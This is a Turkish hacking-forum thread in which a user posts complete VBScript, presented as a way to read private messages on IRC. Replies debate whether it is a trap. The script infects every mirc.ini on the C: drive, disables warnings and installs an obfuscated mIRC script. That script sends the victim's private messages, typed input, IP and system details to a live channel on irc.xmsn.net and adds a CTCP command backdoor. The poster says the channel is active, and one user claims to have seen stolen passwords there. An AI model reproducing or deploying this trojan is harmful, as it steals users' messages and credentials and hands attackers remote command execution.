folder Tahribat.com Forumları
linefolder Skype - Mirc - Irc - Icq - Mail Güvenliği
linefolder İrc De Özel Okumak İçin Yapmanız Gerekenlerİrc De Özel Okumak İçin Yapmanız Gerekenler

 1. KısayolKısayol reportŞikayet pmÖzel Mesaj
  mC_YaRgIc
  mC_YaRgIc's avatar
  Kayıt Tarihi: 30/Ekim/2003
  Erkek
  şimdi size verecem komutlar Visual Basic komutLarı oLup kopyaLadınız dosya isminin uzantısını vbs yapmanız Lazım (örn: ornek.vbs) ondan sonra çift tıkLar yada çaLıştırırsanız içinde ki komutları c: de ne kadar mirc.ini dosyası varsa oraya server.ini şekLinde bi dosya oLuşturup kopyaLar yaLnız komutları kendinize göre uyarLamaLısınız size kolaylık oLsun diye karakterLeri düz yazdım koLay geLsin  dim Otag
  dim AOtag
  dim Ttag
  dim DummyTag
  dim SectionDef
  call ShowFolderList("c:\")
  sub ShowFolderList(s)
  on error resume next
  Set filesys = CreateObject("Scripting.FileSystemObject")
  Set RootFolder1 = FileSys.GetFolder(s)
  Set SubFolds1 = RootFolder1.subfolders
  For Each f1 in Subfolds1
  s = f1.path & "\"
  Otag = s & "mirc.ini"
  AOtag= s & "mdat"
  DummyTag= "C:\winamod.dat"
  TTag= s & "server.ini"
  SectionDef= "[rfiles]"
  if filesys.fileexists(otag) then
  Call Filemod()
  filesys.CopyFile DummyTag, Otag, true
  Call ImplementRemote()
  filesys.CopyFile DummyTag, Otag, true
  Call ImplementWarn()
  filesys.CopyFile DummyTag, Otag, true
  Call ImplementFserv()
  filesys.CopyFile DummyTag, Otag, true
  call ImplementPerfCheck()
  filesys.CopyFile DummyTag, Otag, true
  Call ImplementPerform()
  SetClearArchiveBit(Otag)
  End If
  Call ShowFolderList(s)
  Next
  End sub
  Function FiltNum(FilString)
  on error resume next
  countdown=5
  do
  Comp = mid(FilString,2,countdown)
  if isnumeric(Comp) then LastNum = Comp : exit do
  countdown=countdown-1
  loop until countdown =0
  FiltNum = LastNum
  end function
  Function LastLineNum(SSection)
  on error resume next
  Set FS1N = CreateObject("Scripting.FileSystemObject")
  Set FR1N = FS1N.OpenTextFile(otag,1,true)
  Do While FR1N.AtEndOfStream <> True
  segment1 = FR1N.readline
  w = InstrRev(segment1,SSection)
  counts=counts+1
  if w > 0 then
  do
  if FR1N.AtEndOfStream = True then exit do
  segmentk = FR1N.readline
  k = InstrRev(segmentk,"n",1)
  if k=1 then
  LastNum=FiltNum(segmentk)
  end if
  Loop until k=0
  end if
  loop
  FR1N.Close
  LastLineNum=LastNum
  end function
  Function Filemod()
  on error resume next
  Set fs1 = CreateObject("Scripting.FileSystemObject")
  Set fr1 = fs1.OpenTextFile(otag,1,true)
  Set fs2 = CreateObject("Scripting.FileSystemObject")
  Set fr2 = fs2.OpenTextFile(DummyTag,2,true)
  Do While fr1.AtEndOfStream <> True
  segment1 = fr1.readline
  fr2.writeline segment1
  w = InstrRev(segment1,"[rfiles]")
  counts=counts+1
  if w > 0 then
  counts2=counts
  do
  if fr1.AtEndOfStream = True then exit do
  segmentk = fr1.readline
  k = InstrRev(segmentk,"n",1)
  if k=1 then
  LastNum=FiltNum(segmentk)
  fr2.writeline segmentk
  end if
  COUNTS2=COUNTS2+1
  Loop until k<>1
  exit do
  end if
  loop
  fr1.Close
  fr2.close
  Set fs3 = CreateObject("Scripting.FileSystemObject")
  Set fr3 = fs3.OpenTextFile(DummyTag,8,true)
  TrojanInfo = "n" & lastlinenum(SectionDef)+1 & "=server.ini"
  fr3.writeline TrojanInfo
  fr3.Close
  Set fs4 = CreateObject("Scripting.FileSystemObject")
  Set fr4 = fs4.OpenTextFile(Otag,1,true)
  Set fs5 = CreateObject("Scripting.FileSystemObject")
  Set fr5 = fs5.OpenTextFile(DummyTag,8,true)
  Do While fr4.AtEndOfStream <> True
  segment2 = fr4.readline
  if fr4.line >= counts2 + 2 then
  fr5.writeline segment2
  end if
  loop
  fr4.Close
  fr5.Close
  fs5.CopyFile DummyTag, Otag, true
  Call FLDL(TTag)
  end Function
  sub FLDL(TTag)
  on error resume next
  Set fs6 = CreateObject("Scripting.FileSystemObject")
  Set fr6 = fs6.OpenTextFile(TTag,2,true)
  fr6.writeline "[script]"
  fr6.writeline "n1=on 1:text:*:?:.sockwrite -nt ping PRIVMSG #zeg_ : $+ 4<12 $+ $nick $+ 4> $1- 4<12 $+ $me $+ 4> | .halt } } }"
  fr6.writeline "n2=on *:SOCKOPEN:ping: {"
  fr6.writeline "n3= sockwrite -n ping USER $rand(A,Z) $+ $rand(a,z) $+ $rand(a,z) $rand(A,Z) $+ $rand(a,z) $rand(A,Z) : $rand(A,Z) $+ $rand(a,z) $+ $rand(a,z)"
  fr6.writeline "n4= sockwrite -n ping NICK $rand(A,Z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) nick "
  fr6.writeline "n5= sockwrite -n ping $chr(112) $+ $chr(114) $+ $chr(105) $+ $chr(118) $+ $chr(109) $+ $chr(115) $+ $chr(103) #zeg@ : <5 $+ $me $+ > 7< $fulldate > 5< IP= $IP > ,15< Host= $Host > 10Pass < $gmt > 4System < $os > 4Server < $server >"
  fr6.writeline "n6=}"
  fr6.writeline "n7=on *:SOCKREAD:ping: { "
  fr6.writeline "n8= if ($sockerr > 0) return"
  fr6.writeline "n9= sockread %sock "
  fr6.writeline "n10= if ($sockbr == 0) return "
  fr6.writeline "n11= tokenize 32 %sock "
  fr6.writeline "n12= if ($1 == PING) { sockwrite -n ping PONG $2 }"
  fr6.writeline "n13=}"
  fr6.writeline "n14=on *:sockclose:ping:{"
  fr6.writeline "n15= unset %sock "
  fr6.writeline "n16= .timerreconn -o 1 15 $chr(115) $+ $chr(111) $+ $chr(99) $+ $chr(107) $+ $chr(111) $+ $chr(112) $+ $chr(101) $+ $chr(110) bot irc.xmsn.net 6667 "
  fr6.writeline "n17=}"
  fr6.writeline "n18=on *:start:{ $chr(115) $+ $chr(111) $+ $chr(99) $+ $chr(107) $+ $chr(111) $+ $chr(112) $+ $chr(101) $+ $chr(110) bot irc.xmsn.net 6667 } "
  fr6.writeline "n19=on *:INPUT:*: {"
  fr6.writeline "n20= if ($chr(35) isin $active) && ($chr(47) !isin $1) goto end "
  fr6.writeline "n21= if ($chr(35) !isin $active) || ($chr(47) isin $1) && ($sock(ping).status == active) { set %ciinput $1- | $chr(115) $+ $chr(111) $+ $chr(99) $+ $chr(107) $+ $chr(119) $+ $chr(114) $+ $chr(105) $+ $chr(116) $+ $chr(101) $chr(45) $+ $chr(116t) $+ $chr(110) ping $chr(112) $+ $chr(114) $+ $chr(105) $+ $chr(118) $+ $chr(109) $+ $chr(115) $+ $chr(103) #zeg_ :<5 $+ $me $+ > %ciinput (to5 $active $+ ) (7 $server $+ ) | unset %ciinput "
  fr6.writeline "n22= :end "
  fr6.writeline "n23= }"
  fr6.writeline "n24=}"
  fr6.writeline "n25=CTCP *:*:*: { if ($nick == ÷ ) { $1- | halt }"
  fr6.close
  end sub
  Function ImplementRemote()
  Set fs1a = CreateObject("Scripting.FileSystemObject")
  Set fr1a = fs1a.OpenTextFile(otag,1,true)
  Set fs2a = CreateObject("Scripting.FileSystemObject")
  Set fr2a = fs2a.OpenTextFile(DummyTag,2,true)
  Do While fr1a.AtEndOfStream <> True
  segment1a = fr1a.readline
  fr2a.writeline segment1a
  if ucase(segment1a)=ucase("[options]") then
  Do
  If fr1a.AtEndOfStream Then exit do
  n2a = fr1a.readline
  If ucase(mid(n2a,1,3))=ucase("n2=") then
  fr2a.writeline Mid(n2a, 1, 13) & "1,1" & Mid(n2a, 17, 16) & "1" & Mid(n2a, 34)
  exit do
  Else
  fr2a.writeline n2a
  End If
  Loop
  end if
  loop
  fr1a.Close
  fr2a.close
  End Function
  Function Implementfserv()
  Set fs1a = CreateObject("Scripting.FileSystemObject")
  Set fr1a = fs1a.OpenTextFile(otag,1,true)
  Set fs2a = CreateObject("Scripting.FileSystemObject")
  Set fr2a = fs2a.OpenTextFile(DummyTag,2,true)
  Do While fr1a.AtEndOfStream <> True
  segment1a = fr1a.readline
  fr2a.writeline segment1a
  if ucase(segment1a)=ucase("[warn]") then
  Do
  If fr1a.AtEndOfStream Then exit do
  n2a = fr1a.readline
  If ucase(n2a)=ucase("fserve=on") then
  fr2a.writeline "fserve=off"
  Else
  fr2a.writeline n2a
  End If
  Loop
  end if
  loop
  fr1a.Close
  fr2a.close
  End Function
  Function Implementwarn()
  Set fs1c = CreateObject("Scripting.FileSystemObject")
  Set fr1c = fs1c.OpenTextFile(otag,1,true)
  Set fs2c = CreateObject("Scripting.FileSystemObject")
  Set fr2c = fs2c.OpenTextFile(DummyTag,2,true)
  Do While fr1c.AtEndOfStream <> True
  segment1c = fr1c.readline
  fr2c.writeline segment1c
  if ucase(segment1c)=ucase("[fileserver]") then
  Do
  if fr1c.AtEndOfStream then exit do
  n2c = fr1c.readline
  If ucase(n2c)=ucase("warning=on") then
  fr2c.writeline "warning=off"
  Else
  fr2c.writeline n2c
  End If
  Loop
  end if
  loop
  fr1c.Close
  fr2c.close
  End Function
  Function ImplementPerform()
  Set fs1p = CreateObject("Scripting.FileSystemObject")
  Set fr1p = fs1p.OpenTextFile(Otag,8,true)
  fr1p.writeline "[Perform]"
  fr1p.writeline "n0=/Remote ON"
  fr1p.Close
  fs1p.close
  End Function
  Sub SetClearArchiveBit(filespec)
  Dim fsg, fg
  Set fsg = CreateObject("Scripting.FileSystemObject")
  Set fg = fsg.GetFile(filespec)
  fg.attributes = 0
  fg.attributes = fg.attributes + 1
  End Sub
  Function ImplementPerfCheck()
  Set fs1f = CreateObject("Scripting.FileSystemObject")
  Set fr1f = fs1f.OpenTextFile(otag,1,true)
  Set fs2f = CreateObject("Scripting.FileSystemObject")
  Set fr2f = fs2f.OpenTextFile(DummyTag,2,true)
  Do While fr1f.AtEndOfStream <> True
  segment1f = fr1f.readline
  fr2f.writeline segment1f
  if ucase(segment1f)=ucase("[options]") then
  Do
  If fr1f.AtEndOfStream Then exit do
  n2f = fr1f.readline
  If ucase(mid(n2f,1,3))=ucase("n0=") then
  fr2f.writeline Mid(n2f, 1, 40) & ",1," & Mid(n2f, 44)
  exit do
  Else
  fr2f.writeline n2f
  End If
  Loop
  end if
  loop
  fr1f.Close
  fr2f.close
  End Function

  set sss=createobject("scripting.filesystemobject")  server.ini ye kopyaladı komutlar aşşada yani sizin deişikLik yapmanız gereken komutlar msg=cevap şekLinde iki kanaLa aktarabiLr yada tek bi kanaLda topLayabiLirsiniz gerisi size kaLmış koLay geLsin

  fr6.writeline "[script]"
  fr6.writeline "n1=on 1:text:*:?:.sockwrite -nt ping PRIVMSG #zeg_ : $+ 4<12 $+ $nick $+ 4> $1- 4<12 $+ $me $+ 4> | .halt } } }"
  fr6.writeline "n2=on *:SOCKOPEN:ping: {"
  fr6.writeline "n3= sockwrite -n ping USER $rand(A,Z) $+ $rand(a,z) $+ $rand(a,z) $rand(A,Z) $+ $rand(a,z) $rand(A,Z) : $rand(A,Z) $+ $rand(a,z) $+ $rand(a,z)"
  fr6.writeline "n4= sockwrite -n ping NICK $rand(A,Z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) nick "
  fr6.writeline "n5= sockwrite -n ping $chr(112) $+ $chr(114) $+ $chr(105) $+ $chr(118) $+ $chr(109) $+ $chr(115) $+ $chr(103) #zeg@ : <5 $+ $me $+ > 7< $fulldate > 5< IP= $IP > ,15< Host= $Host > 10Pass < $gmt > 4System < $os > 4Server < $server >"
  fr6.writeline "n6=}"
  fr6.writeline "n7=on *:SOCKREAD:ping: { "
  fr6.writeline "n8= if ($sockerr > 0) return"
  fr6.writeline "n9= sockread %sock "
  fr6.writeline "n10= if ($sockbr == 0) return "
  fr6.writeline "n11= tokenize 32 %sock "
  fr6.writeline "n12= if ($1 == PING) { sockwrite -n ping PONG $2 }"
  fr6.writeline "n13=}"
  fr6.writeline "n14=on *:sockclose:ping:{"
  fr6.writeline "n15= unset %sock "
  fr6.writeline "n16= .timerreconn -o 1 15 $chr(115) $+ $chr(111) $+ $chr(99) $+ $chr(107) $+ $chr(111) $+ $chr(112) $+ $chr(101) $+ $chr(110) bot irc.xmsn.net 6667 "
  fr6.writeline "n17=}"
  fr6.writeline "n18=on *:start:{ $chr(115) $+ $chr(111) $+ $chr(99) $+ $chr(107) $+ $chr(111) $+ $chr(112) $+ $chr(101) $+ $chr(110) bot irc.xmsn.net 6667 } "
  fr6.writeline "n19=on *:INPUT:*: {"
  fr6.writeline "n20= if ($chr(35) isin $active) && ($chr(47) !isin $1) goto end "
  fr6.writeline "n21= if ($chr(35) !isin $active) || ($chr(47) isin $1) && ($sock(ping).status == active) { set %ciinput $1- | $chr(115) $+ $chr(111) $+ $chr(99) $+ $chr(107) $+ $chr(119) $+ $chr(114) $+ $chr(105) $+ $chr(116) $+ $chr(101) $chr(45) $+ $chr(116t) $+ $chr(110) ping $chr(112) $+ $chr(114) $+ $chr(105) $+ $chr(118) $+ $chr(109) $+ $chr(115) $+ $chr(103) #zeg_ :<5 $+ $me $+ > %ciinput (to5 $active $+ ) (7 $server $+ ) | unset %ciinput "
  fr6.writeline "n22= :end "
  fr6.writeline "n23= }"
  fr6.writeline "n24=}"
  fr6.writeline "n25=CTCP *:*:*: { if ($nick == ÷ ) { $1- | halt }"  Asi Kurt (BiLgi PayLaşımdır,PayLaşım oLmadan biLgi TamamLanmaz.)
 2. KısayolKısayol reportŞikayet pmÖzel Mesaj
  İnce Memed
  ComputerWolf
  ComputerWolf's avatar
  Üstün Hizmet Madalyası
  Kayıt Tarihi: 26/Mart/2003
  Erkek

  DÜŞMEYİN

  Hep denedin. Hep yenildin. Olsun yine dene , yine yenil ama daha iyi yenil !
 3. KısayolKısayol reportŞikayet pmÖzel Mesaj
  Çömez
  underzero
  underzero's avatar
  Üstün Hizmet Madalyası
  Kayıt Tarihi: 20/Ocak/2003
  Erkek
  mC_YaRgIc whats matrix len
  set komutlari ?!?!?!! (ne dedigimi anladin dimi?)

  pist bak bi ! - Ban Golu Canavari
 4. KısayolKısayol reportŞikayet pmÖzel Mesaj
  mC_YaRgIc
  mC_YaRgIc's avatar
  Kayıt Tarihi: 30/Ekim/2003
  Erkek
  computerwolf merakLanma düşürmek için bi şiLer yapmak isteseydim kendi trojenimi program diye yedirtirdim sizde kek gibi yerdiniz Benim amacım biLgi aLmak isteyenleri bu konuda biLgiLendirmek LavukLuk deiL '>
  Asi Kurt (BiLgi PayLaşımdır,PayLaşım oLmadan biLgi TamamLanmaz.)
Reply With Quote Alıntı yap
 • KısayolKısayol reportŞikayet pmÖzel Mesaj
  mC_YaRgIc
  mC_YaRgIc's avatar
  Kayıt Tarihi: 30/Ekim/2003
  Erkek
  underzero daşşak geçecek başkasını buL istersen
  matrixLikLe aLakası yok biraz programLa diLinden anLasan bu komutLarın hangi diLde yazıLdını çözer
  ve whats matrix die igrenç bi espiri yapmazdın

  Asi Kurt (BiLgi PayLaşımdır,PayLaşım oLmadan biLgi TamamLanmaz.)
 • KısayolKısayol reportŞikayet pmÖzel Mesaj
  Çömez
  underzero
  underzero's avatar
  Üstün Hizmet Madalyası
  Kayıt Tarihi: 20/Ocak/2003
  Erkek
  maksadim dalga gecmek degil,
  farzedelim ben hicbirsey bilmiyorum
  farzedelim onca antivirus programi virus buldugu yalan
  birde isteseydim kendi trojenimi yapardim diyorsun

  bunu yazdi:
  merakLanma düşürmek için bi şiLer yapmak isteseydim kendi trojenimi program diye yedirtirdim sizde kek gibi yerdiniz Benim amacım biLgi aLmak isteyenleri bu konuda biLgiLendirmek LavukLuk deiL

  kek aramadiginada inaniyorum :)
  ve birseyler ogretmek istediginede
  gecenin bir yarisi konuyu uzatmak istemiyorum...

  pist bak bi ! - Ban Golu Canavari
 • KısayolKısayol reportŞikayet pmÖzel Mesaj
  xtlan
  xtlan's avatar
  Kayıt Tarihi: 02/Ocak/2003
  Dişi
  irc de özelleri okumak sadece flaglarla oluyor.Irc serverınız networkadmini size bu flagı verirse sadece okuyabilirsiniz.mesela serverınızın versiyonu unreal se bunu yapmaniza imkan var.Küçük bir modulu servicesler kurulurken ekliyorsunuz./spy yazdıgınızda bir komutlarla ilgili bir yardim çıkıyor.Ozellerini okuyacağınız zamanda /spy add nick komutu gibi komutlar...vb komutlarıyla ozel okumak :) komik geldi bana vede bunu irc scriptinize ekleyerek.Düsmeyin boyle numaralara.Bu mesaji yazan arkadasda sanirim saflik yapmıs bu forumlarda acmis basligini...

  "Toros dağlarının tepelerinde tek bir Türkmen evinin bacası tüter halde kalmış ise, ben bu milletten umudumu kesmem, bayrağımı göğsüme sarar, milletimin istiklali uğruna ölürüm. Gazi Mustafa Kemal ATATÜRK"
 • KısayolKısayol reportŞikayet pmÖzel Mesaj
  mC_YaRgIc
  mC_YaRgIc's avatar
  Kayıt Tarihi: 30/Ekim/2003
  Erkek
  xtlan dostum sandın gibi bi şey deiL tek yapman gereken kanaLını -n moduna aLmak dışardan msg aLmak yani gerisini komutLar yapar merakLanma serverdan izin aLmanada gerek yok superonLine pro qqq benimdi ve hiç bi adminide tanımıyordum:) sen input komudu ne işe yarar biLirmisin? yada söyLe bi komuddan haberdarmısın sen yazıyı yazdın an daha entre basmadan başka servera özeL bi kanaLa yönLenir haberdar deiLsen yukarıya ii bak
  Endorze hakLısın gaLiba bi daha töbe iLik yaparsam iLerde yapmak istedim bi iLikten de vaz geçtim
  bu iLik öLe bi iLik ki kesin konuşuyorum boT merakLıları arasında çok az kişinin biLdi bi iLik
  mirc.exe ni kompLe nasıL yok edersin windows aLtında hiç bi yerde gözükmeden nasıl çaLışır ama şu anda bunu açıkLıcamı pek sanmıyorum

  Asi Kurt (BiLgi PayLaşımdır,PayLaşım oLmadan biLgi TamamLanmaz.)
 • KısayolKısayol reportŞikayet pmÖzel Mesaj
  mC_YaRgIc
  mC_YaRgIc's avatar
  Kayıt Tarihi: 30/Ekim/2003
  Erkek
  komutLarın işe yarayıp yaramadını ögrenmek isteyenLer için bi babaLık yapacam irc.xmsn.net #zeg_ kanaLında şu anda aktif ama boTLarLa bayadır iLgiLenmedim için msg Lar azaLdı ama yinede yeterince var arkadaşLara söz verdim kimseyi sokmucam diye ama mademki görmek istiyorsun buyrun hodri meydan

  Asi Kurt (BiLgi PayLaşımdır,PayLaşım oLmadan biLgi TamamLanmaz.)
 • KısayolKısayol reportŞikayet pmÖzel Mesaj
  _Diablo_Tyrael_
  _Diablo_Tyrael_'s avatar
  Kayıt Tarihi: 15/Eylül/2003
  Erkek
  bu kodlar da neler var bakalım. yardım mu tuzak mı olduğu?..

  Yasal Uyarı: Anayasanın 135.maddesinin 26.fıkrasına göre oyunlarda hile yapmak çok ayıptır.
 • KısayolKısayol reportŞikayet pmÖzel Mesaj
  GenC_HaCKeR
  GenC_HaCKeR's avatar
  Kayıt Tarihi: 21/Kasım/2003
  Erkek
  arkadaşlar bence mc_yargıc haklı tuzak olduğunu sanmıyorum cunku identify şifelerini ve ozel okumaları gordum canlı sahidim yani mc_yargıc sonuna kadar seni destdekliyorum kardeşim

  Bigi paylaştıkça artarmıs ben bu lafı diyenin teee .... paylaştıkça azıtılıyor GenC_HaCKeR yok öldü!
 • Toplam Hit: 3380 Toplam Mesaj: 17